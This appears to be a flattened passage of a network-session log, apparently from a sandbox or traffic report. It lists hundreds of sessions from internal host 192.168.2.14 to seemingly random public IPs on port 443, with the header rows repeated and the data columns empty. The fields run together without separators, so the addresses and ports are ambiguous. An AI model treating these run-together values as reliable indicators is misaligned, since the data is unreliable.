                                                      20667192.168.2.144663814.2.73.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20668192.168.2.1435836122.24.24.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20669192.168.2.145773860.2.112.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20670192.168.2.1447018143.29.198.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20671192.168.2.1440254117.232.167.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20672192.168.2.1435192168.47.162.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20673192.168.2.146055896.195.231.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20674192.168.2.14427429.145.37.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20675192.168.2.144030078.130.210.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20676192.168.2.1455386139.170.205.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20677192.168.2.1458780174.238.12.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20678192.168.2.1453412166.244.114.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20679192.168.2.1441934118.103.191.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20680192.168.2.143639483.115.124.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20681192.168.2.1455668147.30.101.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20682192.168.2.1453006115.144.135.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20683192.168.2.1456820173.203.227.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20684192.168.2.1446486108.92.157.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20685192.168.2.1454984159.32.231.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20686192.168.2.145001847.39.102.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20687192.168.2.1441770133.210.54.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20688192.168.2.144499473.25.40.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20689192.168.2.145954285.87.245.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20690192.168.2.144260623.231.198.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20691192.168.2.1450340117.135.114.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20692192.168.2.1455892182.77.8.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20693192.168.2.1451536218.7.240.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20694192.168.2.1435592152.184.152.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20695192.168.2.1455820184.4.230.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20696192.168.2.144667636.165.204.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20697192.168.2.1451448211.97.179.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20698192.168.2.1446294206.184.191.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20699192.168.2.146026823.240.141.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20700192.168.2.144013661.171.171.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20701192.168.2.1439580104.133.150.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20702192.168.2.1455494198.101.112.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20703192.168.2.144621440.30.83.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20704192.168.2.1434244135.184.232.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20705192.168.2.1436620191.194.92.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20706192.168.2.1434538143.246.194.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20707192.168.2.1458310128.6.214.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20708192.168.2.1452408220.204.230.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20709192.168.2.1446528196.66.87.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20710192.168.2.1433278193.245.181.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20711192.168.2.1445520220.166.196.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20712192.168.2.143537295.202.100.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20713192.168.2.1440672189.73.61.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20714192.168.2.1447210196.38.59.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20715192.168.2.1437594109.103.76.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20716192.168.2.1440390130.78.27.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20717192.168.2.144127875.67.0.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20718192.168.2.1451948201.226.222.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20719192.168.2.1454868195.73.128.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20720192.168.2.14504284.39.96.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20721192.168.2.1452410143.211.76.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20722192.168.2.1447128138.3.164.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20723192.168.2.1455644145.210.71.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20724192.168.2.1454326182.80.107.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20725192.168.2.1440920104.228.107.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20726192.168.2.1435476158.160.74.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20727192.168.2.1442076181.187.81.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20728192.168.2.1438764168.243.203.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20729192.168.2.1447050159.92.235.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20730192.168.2.1436362159.127.225.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20731192.168.2.1442874169.65.108.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20732192.168.2.1446270123.176.85.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20733192.168.2.14334049.21.5.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20734192.168.2.1440884120.90.252.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20735192.168.2.1450230155.158.25.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20736192.168.2.144573243.228.10.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20737192.168.2.1441562123.10.133.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20738192.168.2.1440554104.245.143.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20739192.168.2.1456824123.224.182.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20740192.168.2.1437532200.21.134.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20741192.168.2.1434092195.196.240.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20742192.168.2.1460428159.241.58.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20743192.168.2.1450816176.190.58.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20744192.168.2.143671842.7.49.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20745192.168.2.1445550106.94.201.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20746192.168.2.1452512122.167.47.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20747192.168.2.143748469.127.24.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20748192.168.2.143861450.53.143.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20749192.168.2.1436702195.74.61.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20750192.168.2.1444218177.121.143.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20751192.168.2.1437646153.163.12.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20752192.168.2.143572074.13.6.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20753192.168.2.1444794185.98.147.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20754192.168.2.1449612193.59.147.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20755192.168.2.1440188196.240.211.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20756192.168.2.144502098.221.255.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20757192.168.2.144043687.20.50.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20758192.168.2.1460518115.27.166.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20759192.168.2.143958282.163.145.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20760192.168.2.1450898176.37.24.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20761192.168.2.144157869.32.6.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20762192.168.2.144381237.37.203.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20763192.168.2.144400832.149.61.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20764192.168.2.144880692.5.86.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20765192.168.2.1446198155.127.190.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20766192.168.2.145271697.247.124.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20767192.168.2.1458932122.198.42.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20768192.168.2.145597640.120.104.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20769192.168.2.1458612164.1.15.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20770192.168.2.145360651.85.68.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20771192.168.2.1448970116.246.214.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20772192.168.2.144840634.196.162.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20773192.168.2.144123450.109.245.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20774192.168.2.1456362199.229.39.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20775192.168.2.145209858.251.89.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20776192.168.2.146051446.128.168.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20777192.168.2.144858283.147.186.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20778192.168.2.144790214.181.158.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20779192.168.2.1435940175.27.140.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20780192.168.2.1452924105.69.156.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20781192.168.2.14570602.136.249.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20782192.168.2.145708685.75.121.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20783192.168.2.1448602106.187.123.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20784192.168.2.1448976163.43.245.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20785192.168.2.1432848157.174.134.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20786192.168.2.1433822109.186.96.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20787192.168.2.145386219.157.209.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20788192.168.2.1434570179.12.244.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20789192.168.2.145288439.38.110.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20790192.168.2.1443904175.77.253.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20791192.168.2.143280873.6.52.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20792192.168.2.1436360154.192.221.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20793192.168.2.1443606140.125.120.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20794192.168.2.145359278.87.185.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20795192.168.2.143345045.93.31.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20796192.168.2.1452988129.164.140.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20797192.168.2.1450606148.246.210.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20798192.168.2.145886639.239.143.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20799192.168.2.1455908152.15.170.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20800192.168.2.145777087.153.4.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20801192.168.2.1444618196.3.17.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20802192.168.2.1442278107.27.252.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20803192.168.2.14500962.199.210.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20804192.168.2.1460360208.121.150.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20805192.168.2.1454678177.190.48.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20806192.168.2.145403668.181.183.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20807192.168.2.1433990111.205.236.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20808192.168.2.1442768219.31.133.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20809192.168.2.1459382152.79.165.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20810192.168.2.143449466.169.236.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20811192.168.2.1458970128.172.210.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20812192.168.2.1442480143.64.178.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20813192.168.2.1445776220.153.239.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20814192.168.2.1437776197.221.173.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20815192.168.2.1436060205.117.187.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20816192.168.2.144155071.147.1.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20817192.168.2.146088892.159.8.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20818192.168.2.1444468155.224.65.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20819192.168.2.1443744198.108.128.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20820192.168.2.1445628142.59.183.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20821192.168.2.1457952123.100.119.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20822192.168.2.1439116222.248.206.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20823192.168.2.145491679.185.40.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20824192.168.2.1436016195.214.246.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20825192.168.2.1455692153.21.23.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20826192.168.2.1452292126.201.234.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20827192.168.2.1440512108.51.77.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20828192.168.2.1453738108.254.218.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20829192.168.2.14337042.200.32.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20830192.168.2.145030239.231.229.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20831192.168.2.1436678206.235.209.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20832192.168.2.1449160196.48.28.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20833192.168.2.144999658.10.14.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20834192.168.2.1453058154.145.184.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20835192.168.2.1441600196.100.97.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20836192.168.2.1460736213.159.156.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20837192.168.2.144622889.101.31.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20838192.168.2.1449444137.212.148.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20839192.168.2.145293479.181.83.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20840192.168.2.1454556113.43.68.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20841192.168.2.1440828161.118.118.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20842192.168.2.1435506112.72.135.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20843192.168.2.1454214138.250.102.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20844192.168.2.1434744155.131.112.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20845192.168.2.145849038.195.182.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20846192.168.2.1459792120.174.249.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20847192.168.2.144591884.122.156.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20848192.168.2.144271291.77.73.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20849192.168.2.143426450.234.144.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20850192.168.2.145667471.3.106.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20851192.168.2.1448742125.47.124.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20852192.168.2.1449086206.129.241.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20853192.168.2.145147619.216.205.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20854192.168.2.1435604203.178.184.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20855192.168.2.145000044.158.200.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20856192.168.2.1435426156.151.46.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20857192.168.2.145452886.224.111.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20858192.168.2.1458986109.5.223.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20859192.168.2.1447132218.184.126.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20860192.168.2.1438762158.155.232.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20861192.168.2.144651431.246.195.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20862192.168.2.1434286187.127.241.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20863192.168.2.143871281.219.105.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20864192.168.2.144254279.106.144.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20865192.168.2.145508297.139.141.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20866192.168.2.1441894154.186.250.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20867192.168.2.144279270.254.15.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20868192.168.2.1444214183.62.138.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20869192.168.2.143653242.197.198.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20870192.168.2.144543066.13.0.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20871192.168.2.1438410146.72.133.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20872192.168.2.1450382175.185.66.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20873192.168.2.14534522.154.113.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20874192.168.2.1445074153.22.208.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20875192.168.2.1450358170.217.162.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20876192.168.2.14440949.21.99.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20877192.168.2.1457402187.237.82.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20878192.168.2.1433032198.142.35.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20879192.168.2.143320620.8.74.21443
